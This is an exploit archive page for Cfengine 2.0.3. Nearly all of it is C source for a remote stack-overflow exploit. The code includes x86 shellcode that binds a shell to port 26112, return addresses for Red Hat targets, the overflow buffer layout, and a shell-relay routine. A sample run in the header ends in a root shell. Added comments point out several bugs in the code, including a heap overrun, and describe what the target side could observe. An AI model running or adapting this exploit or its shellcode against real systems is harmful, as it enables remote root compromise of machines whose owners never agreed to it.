
cfengine.c

cfengine.c
Posted Sep 29, 2003
Authored by jsk

Remote exploit for Cfengine versions 2.-2.0.3 that makes use of a stack overflow discussed here. Binds a shell to port 26112. Tested against RedHat.

tags | exploit, remote, overflow, shell
systems | linux, redhat
SHA-256 | 3d6399d602afc8e1234d04097ff5ebf01664d6980f11dcdde0306ddfc376b787

/*********************************************************************************\

* jsk / cfengine2-2.0.3 from redhat

* advisory: http://packetstormsecurity.nl/0309-advisories/cfengine.txt

* forking portbind shellcode (port=26112) by netric

* bug discovered by nick cleaton, tested on redhat

* DSR-cfengine.pl :) i think it has some bugs. maybe it is only the public
* version...... possibly other reasons.....
* the beginning of the exploit buffer could be like "111111". so....DSR...
* by jsk from Ph4nt0m Security Team

* jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m)

* Greets bR-00t. eSdee.B??.lnewy.#cheese and all #ph4nt0m

* [root@localhost tmp]# ./cnex -h 127.0.0.1 -p 5803 -t 0

*

* cfengine2-2.0.3:server remote buffer overflow exploit

* by jsk.

* Greets bR-00t and all #ph4nt0m .

*[+] Hostname: 127.0.0.1
*[+] Port num: 5308
*[+] Retaddr address: 0x4029cc2c
*[1] #1 Set codes.
*[1] #1 Set socket.
*[*] attempting to connect: 127.0.0.1:5308.
*[*] successfully connected: 127.0.0.1:5308.
*[1] #1 Send codes.
*[1] #3 Get shell.
*[*] checking to see if the exploit was successful.
*[*] attempting to connect: 127.0.0.1:26112.
*[*] successfully connected: 127.0.0.1:26112.
* id
*uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 ** (disk),10(wheel)



\*********************************************************************************/





#include <stdio.h>

#include <signal.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netdb.h>

#include <netinet/in.h>

#define BUFSIZE 4136 /* total payload length handed to write() in main() */

#define D_PORT 5803 /* default target port; overridden with -p */

#define D_HOST "www.ph4nt0m.net" /* placeholder default; main() refuses to run until -h replaces it */

#define TIMEOUT 10 /* seconds for the alarm() armed around each connect() */



/* Raw x86 payload bytes; the header credits them to netric as a port-bind
 * shell on TCP 26112. They are stored as a NUL-terminated string literal
 * with no embedded zero, so sizeof(shell) == strlen(shell)+1; main() uses
 * both forms when laying out the request. From the target's point of view
 * the observable artifact is a new listener on 26112 opened by the server
 * process. */
char shell[]= /* bindshell(26112)&, netric. */

"\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53"
"\x6a\x02\x89\xe1\xb0\x66\x52"
"\x50\xcd\x80\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1"
"\x52\x50\xb0\x66\xcd\x80\x89"
"\xe1\xb3\x04\xb0\x66\xcd\x80"
"\x43\xb0\x66\xcd\x80\x89\xd9"
"\x93\xb0\x3f\xcd\x80\x49\x79"
"\xf9\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
/* One row of the target table (__pl_form) below. */
struct op_plat_st

{

int op_plat_num; /* index printed by x_fp_rm_usage() and chosen with -t */

char *op_plat_sys; /* human-readable target name */

u_long retaddr; /* value main() writes over the tail of the request */

int off_st; /* never read in the visible code */

};

/* Target table indexed by -t. Rows 2 and 3 carry 0x44444444 ("DDDD"),
 * which reads as a placeholder rather than a real address. The trailing
 * bare NULL is not a struct initializer: it initializes only op_plat_num
 * of a fifth, all-zero row (compilers warn about the pointer-to-int
 * conversion). Consequently no row has op_plat_num == 0x82, the value
 * x_fp_rm_usage() loops until it finds, and main()'s "type < 6" check
 * admits indexes 4 and 5 that land on or past this sentinel row.
 * Names beginning with a double underscore are reserved in C. */
struct op_plat_st __pl_form[]=

{



{0,"red 8.0",0x4029cc2c,0},

{1,"red 9.0(cmp)",0x4029cda0,0},



{2,"red 7.2 (Compile)",0x44444444,0},

{3,"red 7.3 (Compile)",0x44444444,0},

NULL

};

/* Forward declarations. sock_connect() hands back the socket descriptor
 * truncated to unsigned short; printe() exits with status 1 when its
 * second argument is nonzero. sig_alarm() has no prototype here. */
void banrl();

void x_fp_rm_usage(char *x_fp_rm);

unsigned short sock_connect(char *,unsigned short);

void getshell(char *,unsigned short);

void printe(char *,short);

void sig_alarm(){printe("alarm/timeout hit.",1);}

/* Print the three-line banner shown before option parsing. */
void banrl()

{

static const char *const lines[]={

"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n",

" by jsk.\n",

" Greets Br-00t and all #ph4nt0m .\n",

};

size_t k;

for(k=0;k<sizeof lines/sizeof lines[0];k++)

fputs(lines[k],stdout);

}



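/* Print usage and the selectable target table, then exit(0).
 * x_fp_rm is argv[0]. The table walk stops at the first row whose
 * op_plat_sys is NULL and is additionally bounded by the array length,
 * replacing the original loop that waited for an op_plat_num of 0x82
 * that no row carries and therefore read past the end of __pl_form.
 * NOTE: the text below lists -s, which getopt() in main() does not
 * accept; the target selector is -t. */
void x_fp_rm_usage(char *x_fp_rm)

{

size_t row;

fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);

fprintf(stdout,"\t -h [hostname] - target host.\n");

fprintf(stdout,"\t -p [port] - port number.\n");

fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");

fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);

fprintf(stdout," Select target number>\n\n");

/* Bounded by the array length as well as the sentinel so a missing
 * terminator can never turn this into an out-of-bounds read. */
for(row=0;row<sizeof __pl_form/sizeof __pl_form[0];row++)

{

if(__pl_form[row].op_plat_sys==NULL)

break;

fprintf(stdout,"\t {%d} %s\n",__pl_form[row].op_plat_num,__pl_form[row].op_plat_sys);

}

fprintf(stdout,"\n");

exit(0);

}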



/* Entry point: parse -h/-p/-t, build a BUFSIZE-byte request and write it
 * to the target port, then try to reach the bind shell on 26112.
 * What the target side can observe: one oversized request that is mostly
 * 0x90 bytes with a 4-byte value repeated at its tail, followed by a new
 * listener on TCP 26112 owned by the server process. */
int main(int argc,char *argv[])

{

int port=D_PORT;

char hostname[0x333]=D_HOST; /* 819-byte buffer; D_HOST doubles as "not set" */

int whlp,type=0;

unsigned int i=0; /* unused */

char *buf;

int sd; /* receives an unsigned short from sock_connect() */

u_long retaddr=__pl_form[type].retaddr; /* default: target 0 */



(void)banrl();

/* 'X'/'x' are accepted by the option string but have no case below, so
 * they are silently ignored. getopt() returns -1 at the end, which this
 * compares against EOF. */
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)

{

extern char *optarg;

switch(whlp)

{

case 'T':

case 't':

/* Only an upper bound is checked. The table has five rows (four real
 * plus an all-zero sentinel), so 4 selects a zero retaddr, 5 reads past
 * the array, and a negative atoi() result indexes before it. */
if((type=atoi(optarg))<6)

{

retaddr=__pl_form[type].retaddr;

}

else (void)x_fp_rm_usage(argv[0]); /* exits */

break;





case 'H':

case 'h':

/* memset plus a size-1 copy keeps hostname NUL-terminated despite strncpy. */
memset((char *)hostname,0,sizeof(hostname));

strncpy(hostname,optarg,sizeof(hostname)-1);

break;



case 'P':

case 'p':

port=atoi(optarg); /* unchecked: non-numeric input yields port 0 */

break;



case 'I':

case 'i':

fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);

exit(-1);



case '?': /* unknown option or missing argument */

(void)x_fp_rm_usage(argv[0]); /* exits */

break;

}

}



/* Refuse to run against the placeholder default host; x_fp_rm_usage()
 * does not return. */
if(!strcmp(hostname,D_HOST))

{

(void)x_fp_rm_usage(argv[0]);

}

/* Stand-alone compound statement, not an else branch. */
{

fprintf(stdout," [+] Hostname: %s\n",hostname);

fprintf(stdout," [+] Port num: %d\n",port);

/* %p with an integer argument is a format/type mismatch (UB); %#lx
 * would match u_long. */
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);

}



fprintf(stdout," [1] #1 Set codes.\n");



/* printe() exits on failure, so buf is non-NULL below. The extra byte
 * at buf[BUFSIZE] is never written. */
if(!(buf=(char *)malloc(BUFSIZE+1)))

printe("getcode(): allocating memory failed.",1);



memset(buf, 0x90, BUFSIZE); /* whole request defaults to 0x90 */

/* Seven leading '1' characters (see the header's remark about DSR). */
buf[0] = '1';
buf[1] = '1';
buf[2] = '1';
buf[3] = '1';
buf[4] = '1';
buf[5] = '1';
buf[6] = '1';

memset(buf+7,0x90,636); /* already 0x90 from the memset above */

/* Copies sizeof(shell) bytes, i.e. the 81 payload bytes plus the NUL. */
memcpy(buf+7+636,shell, sizeof(shell));

/* 7+636+81+3500 = 4224, but only BUFSIZE+1 = 4137 bytes were allocated:
 * this memset runs 87 bytes past the end of the heap block. It also
 * overwrites the NUL copied just above. */
memset(buf+7+636+strlen(shell),0x90,3500);

/* The last 9*sizeof(retaddr) bytes repeat the chosen address. The layout
 * assumes a 4-byte u_long (ILP32); on LP64 each copy is 8 bytes. */
memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(2*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(3*sizeof(retaddr))], &retaddr, sizeof(retaddr));
memcpy(&buf[BUFSIZE-(4*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(5*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(6*sizeof(retaddr))], &retaddr, sizeof(retaddr));
memcpy(&buf[BUFSIZE-(7*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(8*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr));

fprintf(stdout," [1] #1 Set socket.\n");

sd=sock_connect(hostname,port); /* exits on connect failure */

fprintf(stdout," [1] #1 Send codes.\n");

write(sd,buf,BUFSIZE); /* return value (short write / error) is not checked */

close(sd);
sleep(1); /* presumably gives the server-side listener time to appear */
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112); /* hard-coded to match the payload's bind port */
exit(0); /* buf is never freed; the process ends here */

}

/* Open a TCP connection to hostname:port with a TIMEOUT-second alarm and
 * return the descriptor truncated to unsigned short. Any failure goes
 * through printe(..., 1), which exits, so callers never see an error. */
unsigned short sock_connect(char *hostname,

unsigned short port){

int sock;

struct hostent *t;

struct sockaddr_in s; /* never zeroed; sin_zero stays indeterminate */

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); /* -1 on failure is not checked */

s.sin_family=AF_INET;

s.sin_port=htons(port);

printf("[*] attempting to connect: %s:%d.\n",hostname,port);

/* The test is inverted relative to the usual idiom: inet_addr() returns
 * INADDR_NONE (all ones, nonzero) when the string is not a dotted quad,
 * and a nonzero address when it is, so both cases enter this branch and
 * rely on gethostbyname() also accepting numeric strings. Only "0.0.0.0"
 * skips it. */
if((s.sin_addr.s_addr=inet_addr(hostname))){

if(!(t=gethostbyname(hostname)))

printe("couldn't resolve hostname.",1);

memcpy((char*)&s.sin_addr,(char*)t->h_addr,

sizeof(s.sin_addr));

}

signal(SIGALRM,sig_alarm);

alarm(TIMEOUT); /* sig_alarm() exits if connect() hangs this long */

if(connect(sock,(struct sockaddr *)&s,sizeof(s)))

printe("netris connection failed.",1);

alarm(0);

printf("[*] successfully connected: %s:%d.\n",hostname,port);

return(sock); /* int descriptor narrowed to unsigned short */

}

/* Connect to hostname:port (main() passes 26112), send "uname -a;id" and
 * relay stdin <-> socket until the peer closes. On the target, the
 * inbound connection to 26112 carrying that command string is the
 * visible indicator of this stage. Returns on connect failure; otherwise
 * the process ends inside the loop via exit() or printe(). */
void getshell(char *hostname,unsigned short port){

int sock,r;

fd_set fds;

char buf[4096+1]; /* reads are capped at 4096; the +1 is never used */

struct hostent *he;

struct sockaddr_in sa; /* never zeroed */

printf("[*] checking to see if the exploit was successful.\n");

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)

printe("getshell(): socket() failed.",1);

sa.sin_family=AF_INET;

/* Same inverted inet_addr() test as sock_connect(): both numeric and
 * symbolic names pass through gethostbyname(). */
if((sa.sin_addr.s_addr=inet_addr(hostname))){

if(!(he=gethostbyname(hostname)))

printe("getshell(): couldn't resolve.",1);

memcpy((char *)&sa.sin_addr,(char *)he->h_addr,

sizeof(sa.sin_addr));

}

sa.sin_port=htons(port);

signal(SIGALRM,sig_alarm);

alarm(TIMEOUT);

printf("[*] attempting to connect: %s:%d.\n",hostname,port);

/* Failure path returns with sock still open and the alarm still armed;
 * main() calls exit(0) right after, so neither matters in practice. */
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){

printf("[!] connection failed: %s:%d.\n",hostname,port);

return;

}

alarm(0);

printf("[*] successfully connected: %s:%d.\n\n",hostname,port);

signal(SIGINT,SIG_IGN); /* Ctrl-C is ignored for the rest of the session */

/* The literal is 12 characters; the count of 13 also sends its NUL. */
write(sock,"uname -a;id\n",13);

while(1){

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sock,&fds);

if(select(sock+1,&fds,0,0,0)<1) /* no timeout; <1 covers error and 0 */

printe("getshell(): select() failed.",1);

if(FD_ISSET(0,&fds)){

if((r=read(0,buf,4096))<1) /* EOF on stdin is treated as a failure */

printe("getshell(): read() failed.",1);

if(write(sock,buf,r)!=r)

printe("getshell(): write() failed.",1);

}

if(FD_ISSET(sock,&fds)){

if((r=read(sock,buf,4096))<1) /* peer closed: normal exit */

exit(0);

write(1,buf,r); /* return value not checked */

}

}

/* Unreachable: the loop above only leaves via exit(). */
close(sock);

return;

}

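/* Report a failure. err is the caller's description; the original
 * ignored it, so every failure printed the same two lines and the
 * caller-specific message was lost. When e is nonzero the process exits
 * with status 1, otherwise control returns to the caller. */
void printe(char *err,short e){

fprintf(stdout," [-] Failed: %s\n\n",err);

fprintf(stdout," Happy Exploit ! :-)\n\n");

if(e)

exit(1);

}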